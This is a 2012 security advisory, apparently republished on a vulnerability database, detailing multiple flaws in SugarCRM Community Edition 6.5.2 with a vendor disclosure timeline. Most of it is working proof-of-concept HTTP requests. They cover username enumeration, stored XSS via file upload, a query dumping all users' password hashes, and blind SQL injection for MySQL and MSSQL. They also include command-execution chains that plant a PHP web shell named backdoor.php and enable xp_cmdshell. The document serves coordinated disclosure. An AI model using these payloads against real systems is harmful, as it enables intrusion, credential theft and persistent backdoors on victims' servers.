SugarCRM Community Edition 6.5.2 (Build 8410) multiple vulnerabilities

2012.09.02
Credit: Brendan Coles
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########## # SugarCRM Community Edition 6.5.2 (Build 8410) multiple vulnerabilities # ########## # Brendan Coles # http://itsecuritysolutions.org/ # 2012-07-26 # ########## There are multiple security vulnerabilities in SugarCRM Community Edition 6.5.2 (Build 8410) which may allow an attacker to take control of the software. # Version: 6.5.2 (Build 8410) # Homepage: http://sugarcrm.com/ # Vendor Notification: # 2012-07-26 -> secure@sugarcrm.com # 2012-07-27 <- vendor confirmed receipt # 2012-07-29 -> request for patch date # 2012-07-31 <- vendor advised issues will be patched in 6.5.3 # 2012-08-24 -- vendor released 6.5.3 # 2012-08-30 -- advisory released ########## # Packaged Software # ########## SugarCRM Community Edition 6.5.2 (Build 8410) comes in multiple flavors: # FastStack Windows Installer 6.5.2 with MySQL Apache 2.2.21 MySQL 5.5.16 PHP 5.3.8 phpMyAdmin 3.4.8 Zend Framework 1.10.8 # FastStack Windows Installer 6.5.2 with SQL Server Apache 2.2.21 Microsoft SQL Server Express 2005 PHP 5.3.8 Zend Framework 1.10.8 # FastStack Linux Installer 6.5.2 with MySQL Apache 2.2.21 MySQL 5.5.16 PHP 5.3.8 phpMyAdmin 3.4.8 Zend Framework 1.10.8 # FastStack Mac OS X Installer 6.5.2 with MySQL # Not tested Apache MySQL PHP Zend Framework ################################################################################ # Information Disclosure # Full Path Disclosure # Unauthenticated # ################################################################################ The application creates the following file once any user has authenticated and completed the "wizard" introduction. /sugarcrm/cache/include/externalAPI.cache.js This file leaks some application details including the local file path. ################################################################################ # Information Disclosure # Username Enumeration # Unauthenticated # ################################################################################ Unauthenticated users can enumerate valid usernames and user e-mail addresses. The following proof of concept is available: /sugarcrm/vcal_server.php?type=vfb&email=will@example.com /sugarcrm/vcal_server.php?type=vfb&user_name=will ################################################################################ # Information Disclosure # User Schedules # Unauthenticated # ################################################################################ By default all users have an empty key for the iCalendar allowing unauthenticated users to see users' schedules. The following proof of concept is available: /sugarcrm/ical_server.php?type=ics&key=&email=will@example.com /sugarcrm/ical_server.php?type=ics&key=&user_name=will ################################################################################ # Persistent Cross-Site Scripting (XSS) # Authenticated - User Role # ################################################################################ The following proof of concept is available: POST /sugarcrm/index.php HTTP/1.1 Host: 192.168.123.123 Referer: http://127.0.0.1/ Cookie: PHPSESSID=eefo76fskvd5qfpa0oqsd7a5i2 Content-Type: multipart/form-data; boundary=---------------------------2921238217421 Content-Length: 496 -----------------------------2921238217421 Content-Disposition: form-data; name="module" Documents -----------------------------2921238217421 Content-Disposition: form-data; name="action" Save -----------------------------2921238217421 Content-Disposition: form-data; name="filename_file"; filename="anything.jpg" Content-Type: image/jpeg <script>alert(document.cookie+" on "+document.domain)</script> -----------------------------2921238217421 # Response: HTTP/1.1 301 Moved Permanently Date: Mon, 23 Jul 2012 11:08:38 GMT Server: Apache X-Powered-By: PHP/5.3.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ck_login_id_20=1; expires=Sun, 21-Oct-2012 11:08:38 GMT; path=/; domain=192.168.123.123 Set-Cookie: ck_login_language_20=en_us; expires=Sun, 21-Oct-2012 11:08:38 GMT; path=/; domain=192.168.123.123 Set-Cookie: sugar_user_theme=Sugar5; expires=Tue, 23-Jul-2013 11:08:38 GMT Location: index.php?module=Documents&action=DetailView&record=b60e0d55-9ed3-6ce7-c7b5-500d307bd0ca Content-Length: 0 Content-Type: text/html; charset=UTF-8 # View the payload here: /sugarcrm/index.php?entryPoint=download&id=b60e0d55-9ed3-6ce7-c7b5-500d307bd0ca&type=Documents ################################################################################ # Persistent Cross-Site Scripting (XSS) # Authenticated - User Role # ################################################################################ The following proof of concept is available: POST /sugarcrm/index.php HTTP/1.1 Host: 192.168.123.123 Referer: http://127.0.0.1/ Cookie: PHPSESSID=eefo76fskvd5qfpa0oqsd7a5i2 Content-Type: multipart/form-data; boundary=---------------------------2921238217421 Content-Length: 658 -----------------------------2921238217421 Content-Disposition: form-data; name="module" Notes -----------------------------2921238217421 Content-Disposition: form-data; name="action" Save -----------------------------2921238217421 Content-Disposition: form-data; name="filename_file"; filename="anything.jpg" Content-Type: image/jpeg <script>alert(document.cookie+" on "+document.domain)</script> -----------------------------2921238217421 # Response: HTTP/1.1 301 Moved Permanently Date: Mon, 23 Jul 2012 11:08:38 GMT Server: Apache X-Powered-By: PHP/5.3.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ck_login_id_20=1; expires=Sun, 21-Oct-2012 11:08:38 GMT; path=/; domain=192.168.123.123 Set-Cookie: ck_login_language_20=en_us; expires=Sun, 21-Oct-2012 11:08:38 GMT; path=/; domain=192.168.123.123 Set-Cookie: sugar_user_theme=Sugar5; expires=Tue, 23-Jul-2013 11:08:38 GMT Location: index.php?module=Notes&action=DetailView&record=6403f695-bc09-25b9-9140-500d41008d09 Content-Length: 0 Content-Type: text/html; charset=UTF-8 # View the payload here: /sugarcrm/index.php?entryPoint=download&id=6403f695-bc09-25b9-9140-500d41008d09&type=Notes ################################################################################ # Information Disclosure # User Hash Disclosure # Authenticated - User Role # ################################################################################ An authenticated user can view the password hashes of all users. The following proof of concept is available: POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 144 Cookie: PHPSESSID=82liivpdso6dtt4o010rsb3is7 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":"and","field_list":["user_name","first_name","last_name","is_admin","user_hash","system_generated_password"]}]} ################################################################################ # Blind SQL Injection # Authenticated - User Role # ################################################################################ # MySQL on Windows and Linux The following proof of concept is available: POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 215 Cookie: PHPSESSID=82liivpdso6dtt4o010rsb3is7 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":") and substring(version(),1,6) like '5.5.16'--","field_list":["user_name"],"conditions":[{"name":"user_name","op":"starts_with","value":"%"}]}]} # MSSQL on Windows The following proof of concept is available: POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=82liivpdso6dtt4o010rsb3is7 Content-Length: 238 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":") and substring(@@version,1,25) like 'microsoft sql server 2005'--","field_list":["user_name"],"conditions":[{"name":"user_name","op":"starts_with","value":"%"}]}]} ################################################################################ # Remote Command Execution # Authenticated - User Role # ################################################################################ # MySQL on Windows The default MySQL configuration allows arbitrary command execution, if it is running on the same host as the web server, by leveraging the aforementioned blind SQL injection. The following proof of concept is available: POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 207 Cookie: PHPSESSID=82liivpdso6dtt4o010rsb3is7 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":") union select \"<?php @system($_REQUEST['cmd']); ?>\" FROM users INTO OUTFILE 'C://Program Files//sugarcrm-6.5.2//apps//sugarcrm//htdocs//backdoor.php'--","field_list":["user_name"],"conditions":[{"name":"user_name","op":"starts_with","value":"%"}]}]} # View the backdoor here: /sugarcrm/backdoor.php?cmd=dir # MSSQL on Windows The default MSSQL configuration allows arbitrary command execution on the database server by leveraging the aforementioned blind SQL injection. The following proof of concept is available: POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 207 Cookie: PHPSESSID=82liivpdso6dtt4o010rsb3is7 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":");EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell 'calc.exe';--","field_list":["user_name"],"conditions":[{"name":"user_name","op":"starts_with","value":"%"}]}]} # MySQL on Linux By default the database user does not have write access to the web root in the FastStack Linux Installer. ################################################################################ # Remote Command Execution # Authenticated - Administrator Role # ################################################################################ A user with Administrator roles can execute arbitrary commands by abusing the logging functionality. The following proof of concept is available: # Change the log file name to backdoor.php POST /sugarcrm/index.php HTTP/1.1 Host: 192.168.123.123 Referer: http://127.0.0.1/ Cookie: PHPSESSID=s8hdjjam3t6i8of9vvc6702mc4; Content-Type: multipart/form-data; boundary=---------------------------295221455122937 Content-Length: 592 -----------------------------295221455122937 Content-Disposition: form-data; name="action" SaveConfig -----------------------------295221455122937 Content-Disposition: form-data; name="module" Configurator -----------------------------295221455122937 Content-Disposition: form-data; name="logger_file_name" backdoor -----------------------------295221455122937 Content-Disposition: form-data; name="logger_file_ext" .php -----------------------------295221455122937 Content-Disposition: form-data; name="save" Save -----------------------------295221455122937-- # Write to the error log 'backdoor.php' by triggering a database error POST /sugarcrm/index.php?entryPoint=json_server HTTP/1.1 Host: 192.168.123.123 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=s8hdjjam3t6i8of9vvc6702mc4; Content-Length: 230 {"method":"query","id":"anything","params":[{"modules":["Users"],"group":") union select \"<?php @system($_REQUEST[\"cmd\"]); ?>\"--","field_list":["user_name"],"conditions":[{"name":"user_name","op":"starts_with","value":"%"}]}]} # View the backdoor here: /sugarcrm/backdoor.php?cmd=dir # Change the log file name back to "sugarcrm.log" POST /sugarcrm/index.php HTTP/1.1 Host: 192.168.123.123 Referer: http://127.0.0.1/ Cookie: PHPSESSID=s8hdjjam3t6i8of9vvc6702mc4; Content-Type: multipart/form-data; boundary=---------------------------295221455122937 Content-Length: 592 -----------------------------295221455122937 Content-Disposition: form-data; name="action" SaveConfig -----------------------------295221455122937 Content-Disposition: form-data; name="module" Configurator -----------------------------295221455122937 Content-Disposition: form-data; name="logger_file_name" sugarcrm -----------------------------295221455122937 Content-Disposition: form-data; name="logger_file_ext" .log -----------------------------295221455122937 Content-Disposition: form-data; name="save" Save -----------------------------295221455122937-- ##########

References:

http://itsecuritysolutions.org/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top